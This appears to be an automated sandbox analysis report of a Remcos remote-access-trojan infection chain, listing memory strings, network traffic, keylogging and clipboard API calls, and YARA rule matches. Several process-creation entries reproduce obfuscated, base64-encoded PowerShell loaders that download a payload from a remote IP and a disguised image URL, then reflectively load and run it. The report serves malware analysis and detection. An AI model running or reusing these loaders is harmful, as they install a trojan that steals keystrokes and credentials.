                    Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.2201379417.0000000002C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comcationProtocols.Commands/WOW64
                    Source: powershell.exe, 00000003.00000002.2203877007.0000000005BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgt
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                    Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.6:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49759 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000011_2_004099E4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,11_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,11_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,11_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,11_2_00409B10
                    Source: Yara matchFile source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6860, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4536165624.0000000001348000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6860, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0041BB87 SystemParametersInfoW,11_2_0041BB87

                    System Summary

                    barindex
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovalsJump to behavior
                    Source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: CasPol.exe PID: 6860, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52Yn